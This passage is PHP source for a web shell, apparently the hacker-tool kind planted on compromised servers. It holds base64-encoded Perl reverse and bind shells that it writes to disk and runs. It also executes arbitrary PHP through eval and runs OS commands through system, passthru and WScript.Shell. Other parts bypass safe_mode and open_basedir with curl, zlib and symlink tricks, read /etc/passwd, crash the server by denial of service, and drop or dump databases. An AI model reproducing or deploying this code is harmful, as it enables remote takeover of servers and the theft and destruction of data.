536KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
537KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
538IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
539ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
540$opbc=fopen("bcc.pl","w");
541fwrite($opbc,base64_decode($bcperl));
542fclose($opbc);
543system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
544}
545function wbp($wb){
546$wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
547cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
548a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
549ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
550IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
551IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
552VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
553VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
554$opwb=fopen("wbp.pl","w");
555fwrite($opwb,base64_decode($wbp));
556fclose($opwb);
557echo getcwd();
558system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
559}
560function lbp($wb){
561$lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
562YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
563U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
564VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
565QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
566dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
567b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
568Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
569$oplb=fopen("lbp.pl","w");
570fwrite($oplb,base64_decode($lbp));
571fclose($oplb);
572system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
573}
574
575if($_REQUEST['portbw']){
576wbp($_REQUEST['portbw']);
577
578}if($_REQUEST['portbl']){
579lbp($_REQUEST['portbl']);
580}
581if($_REQUEST['ipcb'] && $_REQUEST['portbc']){
582bcn($_REQUEST['ipcb'],$_REQUEST['portbc']);
583
584}
585
586if($_REQUEST['do']=="bc"){
587echo $head.$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Back Connect >>>>>><br>Ip Address : <input name=ipcb value=".$_SERVER['REMOTE_ADDR'] ."> Port : <input name=portbc value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Windows Bind Port >>>>>><br>Port : <input name=portbw value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Linux Bind Port >>>>>><br>Port : <input name=portbl value=5555><br><input type=submit value=Connect></form>".$end;exit;
588
589}
590function copyf($file1,$file2,$filename){
591global $slash;
592$fpc = fopen($file1, "rb");
593$source = '';
594while (!feof($fpc)) {
595$source .= fread($fpc, 8192);
596}
597fclose($fpc);
598$opt = fopen($file2.$slash.$filename, "w");
599fwrite($opt, $source);
600fclose($opt);
601}
602if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){
603if(is_writable($_REQUEST['cpyto'])){
604echo $_REQUEST['address'];
605copyf($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto'],$_REQUEST['copyname']);
606}else{alert("Permission Denied !");}}
607if($_REQUEST['cfilename']){
608
609echo $head.$formp.$nowaddress.'<p align="center"><b>Create File</b><br><textarea rows="19" name="nf4cs" cols="87"></textarea><br><input value="'.$_REQUEST['cfilename'].'" name=nf4c size=50><br><input type=submit value=" Create "></form>'.$end;exit;
610}
611
612if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){
613if($ofile4c=fopen($_REQUEST['nf4c'],"w")){
614fwrite($ofile4c,$_REQUEST['nf4cs']);
615fclose($ofile4c);
616alert("File Saved !");}else{alert("Permission Denied !");}}
617
618function sqlclienT(){
619global $t,$errorbox,$et,$hcwd;
620if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
621$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
622$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];
623$_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUEST['useR'];
624
625}
626
627if (isset ($_GET[select_db])){
628 $getdb=$_GET[select_db];
629 $_SESSION[db]=$getdb;
630 $query="SHOW TABLES";
631 $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
632}
633elseif (isset ($_GET[select_tbl])){
634 $tbl=$_GET[select_tbl];
635 $_SESSION[tbl]=$tbl;
636 $query="SELECT * FROM `$tbl`";
637 $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
638}
639elseif (isset ($_GET[drop_db])){
640 $getdb=$_GET[drop_db];
641 $_SESSION[db]=$getdb;
642 $query="DROP DATABASE `$getdb`";
643 querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'',$query);
644 $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'','SHOW DATABASES');
645}
646elseif (isset ($_GET[drop_tbl])){
647 $getbl=$_GET[drop_tbl];
648 $query="DROP TABLE `$getbl`";
649 querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
650 $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],'SHOW TABLES');
651}
652elseif (isset ($_GET[drop_row])){
653 $getrow=$_GET[drop_row];
654 $getclm=$_GET[clm];
655 $query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'";
656 $tbl=$_SESSION[tbl];
657 querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
658 $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`");
659}
660else
661 $res=querY($type,$server,$user,$pass,$db,$query);
662
663if($res){
664$res=htmlspecialchars($res);
665$row=array ();
666$title=explode('[+][+][+]',$res);
667$trow=explode('[-][-][-]',$title[1]);
668$row=explode('|+|+|+|+|+|',$title[0]);
669$data=array();
670$field=$trow[count($trow)-2];
671if (strstr($trow[0],'Database')!='')
672 $obj='db';
673elseif (substr($trow[0],0,6)=='Tables')
674 $obj='tbl';
675else
676 $obj='row';
677$i=0;
678foreach ($row as $a){
679if($a!='')
680$data[$i++]=explode('|-|-|-|-|-|',$a);
681}
682
683echo "<table border=1 bordercolor='#C6C6C6' cellpadding='2' bgcolor='EAEAEA' width='100%' style='border-collapse: collapse'><tr>";
684foreach ($trow as $ti)
685echo "<td bgcolor='F2F2F2'>$ti</td>";
686echo "</tr>";
687$j=0;
688while ($data[$j]){
689 echo "<tr>";
690 foreach ($data[$j++] as $dr){
691 echo "<td>";
692 if($obj!='row') echo "<a href='$_SERVER[PHP_SELF]?do=db&select_$obj=$dr'>";
693 echo $dr;
694 if($obj!='row') echo "</a>";
695 echo "</td>";
696 }
697 echo "<td><a href='$_SERVER[PHP_SELF]?do=db&drop_$obj=$dr";
698 if($obj=='row')
699 echo "&clm=$field";
700 echo "'>Drop</a></td></tr>";
701}
702echo "</table><br>";
703
704}
705
706
707
708
709
710if(empty($_REQUEST['typE']))$_REQUEST['typE']='';
711echo "<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'><table border='1' width='400' style='border-collapse: collapse' id='table1' bordercolor='#C6C6C6' cellpadding='2'><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Connect to Database</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Type:</font></td><td width='250' bgcolor='#EAEAEA'><select name=typE><option valut=MySQL onClick='document.client.serveR.disabled = false;' ";
712if ($_REQUEST['typE']=='MySQL')echo 'selected';
713echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";
714if ($_REQUEST['typE']=='MSSQL')echo 'selected';
715echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";
716if ($_REQUEST['typE']=='Oracle')echo 'selected';
717echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";
718if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';
719echo ">PostgreSQL</option><option valut=DB2 onClick='document.client.serveR.disabled = false;' ";
720if ($_REQUEST['typE']=='DB2')echo 'selected';
721echo ">IBM DB2</option></select></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Server Address:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
722if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost';
723echo "' name=serveR size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Username:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text name=useR value='";
724if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root';
725echo "' size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Password:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
726if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123';
727echo "' name=pasS size=35></td></tr><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Submit a Query</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Name:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
728if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);
729echo "' name=dB size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Query:</font></td><td width='250' bgcolor='#EAEAEA'><textarea name=querY rows=5 cols=27>";
730if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES';
731echo "</textarea></td></tr><tr><td width='400' colspan='2' bgcolor='#EAEAEA'>$hcwd<input class=buttons type=submit value='Submit' style='float: right'></td></tr></table></form>$et</center>";
732}
733
734
735function querY($type,$host,$user,$pass,$db='',$query){
736$res='';
737switch($type){
738case 'MySQL':
739if(!function_exists('mysql_connect'))return 0;
740$link=mysql_connect($host,$user,$pass);
741if($link){
742if(!empty($db))mysql_select_db($db,$link);
743$result=mysql_query($query,$link);
744if ($result!=1){
745while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
746$res.='[+][+][+]';
747for($i=0;$i<mysql_num_fields($result);$i++)
748$res.=mysql_field_name($result,$i).'[-][-][-]';
749}
750mysql_close($link);
751return $res;
752}
753break;
754case 'MSSQL':
755if(!function_exists('mssql_connect'))return 0;
756$link=mssql_connect($host,$user,$pass);
757if($link){
758if(!empty($db))mssql_select_db($db,$link);
759$result=mssql_query($query,$link);
760while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
761$res.='[+][+][+]';
762for($i=0;$i<mssql_num_fields($result);$i++)
763$res.=mssql_field_name($result,$i).'[-][-][-]';
764mssql_close($link);
765return $res;
766}
767break;
768case 'Oracle':
769if(!function_exists('ocilogon'))return 0;
770$link=ocilogon($user,$pass,$db);
771if($link){
772$stm=ociparse($link,$query);
773ociexecute($stm,OCI_DEFAULT);
774while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
775$res.='[+][+][+]';
776for($i=0;$i<oci_num_fields($stm);$i++)
777$res.=oci_field_name($stm,$i).'[-][-][-]';
778return $res;
779}
780break;
781case 'PostgreSQL':
782if(!function_exists('pg_connect'))return 0;
783$link=pg_connect("host=$host dbname=$db user=$user password=$pass");
784if($link){
785$result=pg_query($link,$query);
786while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
787$res.='[+][+][+]';
788for($i=0;$i<pg_num_fields($result);$i++)
789$res.=pg_field_name($result,$i).'[-][-][-]';
790pg_close($link);
791return $res;
792}
793break;
794case 'DB2':
795if(!function_exists('db2_connect'))return 0;
796$link=db2_connect($db,$user,$pass);
797if($link){
798$result=db2_exec($link,$query);
799while($data=db2_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
800$res.='[+][+][+]';
801for($i=0;$i<db2_num_fields($result);$i++)
802$res.=db2_field_name($result,$i).'[-][-][-]';
803db2_close($link);
804return $res;
805}
806break;
807}
808return 0;
809}
810function bywsym($file){
811if(!function_exists('symlink')){echo "Function Symlink Not Exist";}
812
813if(!is_writable("."))
814 die("not writable directory");
815$level=0;
816for($as=0;$as<$fakedep;$as++){
817 if(!file_exists($fakedir))
818 mkdir($fakedir);
819 chdir($fakedir);
820}
821while(1<$as--) chdir("..");
822$hardstyle = explode("/", $file);
823for($a=0;$a<count($hardstyle);$a++){
824 if(!empty($hardstyle[$a])){
825 if(!file_exists($hardstyle[$a]))
826 mkdir($hardstyle[$a]);
827 chdir($hardstyle[$a]);
828 $as++;
829}}
830$as++;
831while($as--)
832 chdir("..");
833@rmdir("fakesymlink");
834@unlink("fakesymlink");
835@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
836while(1)
837 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
838 else $num++;
839@unlink("fakesymlink");
840mkdir("fakesymlink");
841}
842function bypcu($file){
843$level=0;
844
845if(!file_exists("file:"))
846 mkdir("file:");
847chdir("file:");
848$level++;
849
850$hardstyle = explode("/", $file);
851
852for($a=0;$a<count($hardstyle);$a++){
853 if(!empty($hardstyle[$a])){
854 if(!file_exists($hardstyle[$a]))
855 mkdir($hardstyle[$a]);
856 chdir($hardstyle[$a]);
857 $level++;
858 }
859}
860
861while($level--) chdir("..");
862
863$ch = curl_init();
864
865curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
866
867echo '<FONT COLOR="RED"> <textarea rows="40" cols="120">';
868
869if(FALSE==curl_exec($ch))
870 die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
871
872echo ' </textarea> </FONT>';
873
874curl_close($ch);
875}
876if ($_REQUEST['bypcu']){
877bypcu($_REQUEST['bypcu']);
878}
879if($_REQUEST['do']=="bypasscmd"){
880if($_POST['bycw']){
881echo $_POST['bycw'];
882$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll');
883 $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw']."");
884 $stdout = $exec->StdOut();
885 $stcom = $stdout->ReadAll();}
886
887echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);} echo $stcom.'</textarea><hr><center>Bypass Safe_Mode And Disable_Functions In Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'<input type=hidden value="bypasscmd" name=do>Command </font></td><td width="750"><input name=bycw size=50><input type=submit value ="eXecute"></form></td></tr></table>Bypass Safe_Mode Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Command </font></td><td width="750"><input name=byws size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypasscmd"></form></td></tr></table>'.$end;exit;;
888}
889if($_REQUEST['do']=="bypassdir"){
890if($_POST['byoc']){
891if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){
892$bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder";
893}else{$bopens="Can Not Bypass This";}
894}
895if($_POST['byfc']){
896curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__);
897$debfc=curl_exec($ch);
898}
899if($_POST['byetc']){
900for($bye=0;$bye<40000;$bye++){
901$sbep =$sbep. posix_getpwuid($bye);
902}}
903if($_POST['byfc9']){
904echo "not sucsfull";
905}
906if($_REQUEST['bysyml']){
907$file=$_REQUEST['bysyml'];
908bywsym($file);
909}
910echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);}if(isset($sbep)){for($fbe=0;$fbe<count($sbep);$fbe++){echo $sbep[$fbe];}} if(isset($debfc)){} echo $bopens.'</textarea><hr><center>Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right">'.$formp.'<input type=hidden value="bypassdir" name=do><font face="Tahoma" style="font-size: 10pt; font-weight:700">Address File </font></td><td width="750"><input name=byoc size=50 ><input type=submit value ="read"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc9 size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass /Etc/Passwd<br>'.$formp.'<input type=submit value ="Read Passwd"><input type=hidden name=byetc value="lol"><input type=hidden name=do value="bypassdir"></form><hr>Bypass With ini_restore'.$formp.'<input type=submit value ="Read File"><input name=rfili value="Pejijon" type=hidden><input type=hidden name=do value="bypassdir"></form><hr>Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bysyml size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"><input name=rfili value="Pejijon" type=hidden></form></td></tr></table><hr>'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bypcu size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"></form></td></tr></table>'.$end;exit;;
911
912
913
914
915}
916function printdrive(){
917global $slash;
918foreach (range("A","Z") as $tempdrive) {
919if (is_dir($tempdrive.":".$slash)){
920$adri=$tempdrive.":".$slash;
921$drivea=$drivea.'<a href="?address='.$adri.'"><font size=1>'.$tempdrive.':'.$slash.' </a></font>';
922}
923}
924return $drivea;
925}
926if($_POST['nameren'] && $_POST['addressren']){
927if(is_writable($_REQUEST['addressren'])){
928
929rename($_POST['addressren'],$_POST['nameren']);alert("Rename Successful !");
930}else{alert("Permission Denied !");}
931}
932if($_GET['do']=="delete"){
933
934if ($_GET['type']=="dir"){
935if(is_writable($_REQUEST['address'])){
936$dir=$_GET['address'].$_GET['filename'];
937deleteDirectory($dir);
938alert("Deleted Successful !");
939}else{alert("Permission Denied !");}
940}elseif($_GET['type']=="file"){
941if(is_writable($_GET['address'].$_GET['filename'])){
942unlink($_GET['address'].$_GET['filename']);alert("Deleted Successful !");
943}else{alert("Permission Denied !");}
944}
945}
946if($_POST['fedit'] && $_POST['namefe']){
947if(is_writable($_REQUEST['address'])){
948
949
950$opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w");
951fwrite($opensave,html_entity_decode($_POST['fedit']));
952fclose($opensave);alert("File Saved Successful !");
953}else{alert("Permission Denied !");}
954}
955if ($_POST['evalsource']){
956
957eval($_POST['evalsource']);
958}
959if($_GET['do']=="eval"){
960echo $head.$formp.$nowaddress.'<p align="center"><textarea rows="19" name="evalsource" cols="87"></textarea><br><input type=submit value=" eXecute "></form></p>'.$end;exit;
961}
962if($_GET['do']=="info"){
963
964if(ini_get('register_globals')){
965$registerg="Enable";
966}else{
967$registerg="disable";
968}
969if(extension_loaded('curl')){
970$curls="Enable";
971}else{
972$curls="disable";
973}
974if(@function_exists('mysql_connect')){
975$db_on = "Mysql : On";
976};
977if(@function_exists('mssql_connect')){
978$db_on = "Mssql : On";
979};
980if(@function_exists('pg_connect')){
981$db_on = "PostgreSQL : On";
982};if(@function_exists('ocilogon')){
983$db_on = "Oracle : On";
984};
985
986echo $head."<font face='Tahoma' size='2'>Operating System : ".php_uname()."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Disable_Functions : ".$disablef."<br>Safe_Mode : ".$safe_modes."<br>Openbase_dir : ".ini_get('openbase_dir')."<br>Php Version : ".phpversion()."<br>Free Space : ".sizee(disk_free_space("/"))."<br>Total Space : ".sizee(disk_total_space("/"))."<br>Register_Globals : ".$registerg."<br>Curl : ".$curls."<br>Database ".$db_on."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Admin Server : ".$_SERVER['SERVER_ADMIN'].$end;
987exit;
988}
989if ($_GET['do']=="cmd"){
990echo $head.'
991<form method=get action="'.$me.'">
992<p align="center">
993<textarea rows="19" name="S1" cols="87">';
994if (strlen($_GET['command'])>1 && $_GET['execmethod']!="popen"){
995echo $_GET['execmethod']($_GET['command']);}
996if (strlen($_POST['command'])>1 && $_POST['execmethod']!="popen"){
997echo $_POST['execmethod']($_POST['command']);}
998
999if (strlen($_GET['command'])>1 && $_GET['execmethod']=="popen"){
1000popen($_GET['command'],"r");}
1001
1002echo'</textarea></p><p align="center">
1003<input type=hidden name="do" size="50" value="cmd"> <input type="text" name="command" size="50"><select name=execmethod>
1004 <option value="system">System</option> <option value="exec">Exec</option> <option value="passthru">Passthru</option><option value="popen">popen</option>
1005</select><input type="submit" value="eXecute">
1006</p></form>'.$end;exit;}
1007if ($_GET['do']=="symlink"){
1008echo $head.'
1009<form method=post action="'.$me.'">
1010<p align="center">
1011SymLink With PHP<br><input name=ad1syp size=50> TO <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syp size=50><br><input type=submit value=SymLink!><hr><p align="center"></form>
1012<form method=post action="'.$me.'"><p align="center">
1013
1014SymLink With OS : <br><input name=ad1syc size=50> TO <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syc size=50><br><input type=submit value=SymLink!>
1015</p></form>'.$end;exit;}
1016if ($_POST['ad1syp'] && $_POST['ad2syp']){
1017if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){
1018alert("Symlink Worked !");
1019}else{
1020alert("Symlink Not Worked !");
1021}}
1022if ($_POST['ad1syc'] && $_POST['ad2syc']){
1023if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){
1024alert("Symlink Worked !");
1025}else{alert("Symlink Not Worked !");}
1026}
1027if ($_GET['do']=="d0slocal"){
1028echo $head.'
1029<p align="center">If You Click This Link This Server Crashed.<br>This Worked In Php 5.3.x : <a href="?dosthisserver=1" target="_blank"><font size=4>Dos This Server I Am Sure </font></a><br>This Worked In Php 4.x.x And 5.2.9 : <a href="?dosthisserver=2" target="_blank"><font size=4>Dos This Server I Am Sure </a>'.$end;exit;}
1030if ($_GET['dosthisserver']=="1"){
1031function dosserver(){
1032$junk=str_repeat("99999999999999999999999999999999999999999999999999",99999);
1033for($i=0;$i<2;){
1034$buff=bcpow($junk, '3', 2);
1035$buff=null;
1036}
1037}
1038dosserver();
1039}
1040if ($_GET['dosthisserver']=="2"){
1041function cx(){cx();}
1042 cx();
1043}
1044if ($_GET['do']=="convert"){
1045$hash=null;
1046if ($_GET['stringtoh'] && $_GET['hashtoh']=='md5'){
1047$hash=md5($_GET['stringtoh']);
1048}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='sh1'){
1049$hash=sha1($_GET['stringtoh']);
1050}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='crc32'){
1051$hash=crc32($_GET['stringtoh']);
1052}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64e'){
1053$hash=base64_encode($_GET['stringtoh']);
1054}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64d'){
1055$hash=base64_decode($_GET['stringtoh']);
1056}
1057echo $head.'
1058<form method=get action="'.$me.'">
1059<p align="center">Convert<br><input type=hidden name=do value=convert>
1060<input name=stringtoh size=58><select name=hashtoh>
1061<option value="md5">MD5</option>
1062<option value="crc32">CRC32</option>
1063<option value="sha1">SHA1</option>
1064<option value="b64e">Base64 Encode!</option>
1065<option value="b64d">Base64 Decode!</option>
1066<br><textarea cols=60 rows=18>'.$hash.'</textarea><br><input type=submit value="Convert">
1067
1068</p></form>'.$end;exit;}
1069if ($_GET['do']=="dump"){
1070echo $head.'<p align="center">';
1071echo '<table border=1 width=400 style="border-collapse: collapse" bordercolor=#C6C6C6 cellpadding=2><tr><td width=400 colspan=2 bgcolor=#F2F2F2><p align=center><b><font face=Arial size=2 color=#433934>Backup Database</font></b></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>DB Type:</font></td><td width=250 bgcolor=#EAEAEA><form method=post action="'.$me.'"><select name=method><option value="gzip">Gzip</option><option value="sql">Sql</option> </select></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Server:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=server size=35></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Username:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=username size=35></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Password:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=password></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Data Base Name:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=dbname></td></tr><tr><td width=400 colspan=2 bgcolor=#EAEAEA><center><input type=submit value=" Dump! " ></td></tr></table></form></center></table>'.$end;exit;}
1072if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
1073$date = date("Y-m-d");
1074$dbserver = $_POST['server'];
1075$dbuser = $_POST['username'];
1076$dbpass = $_POST['password'];
1077$dbname = $_POST['dbname'];
1078$file = "Dump-$dbname-$date";
1079$method = $_POST['method'];
1080if ($method=='sql'){
1081$file="Dump-$dbname-$date.sql";
1082$fp=fopen($file,"w");
1083}else{
1084$file="Dump-$dbname-$date.sql.gz";
1085$fp = gzopen($file,"w");
1086}
1087function write($data) {
1088global $fp;
1089if ($_POST['method']=='sql'){
1090fwrite($fp,$data);
1091}else{
1092gzwrite($fp, $data);
1093}}
1094mysql_connect ($dbserver, $dbuser, $dbpass);
1095mysql_select_db($dbname);
1096$tables = mysql_query ("SHOW TABLES");
1097while ($i = mysql_fetch_array($tables)) {
1098 $i = $i['Tables_in_'.$dbname];
1099 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
1100 write($create['Create Table'].";\n\n");
1101 $sql = mysql_query ("SELECT * FROM ".$i);
1102 if (mysql_num_rows($sql)) {
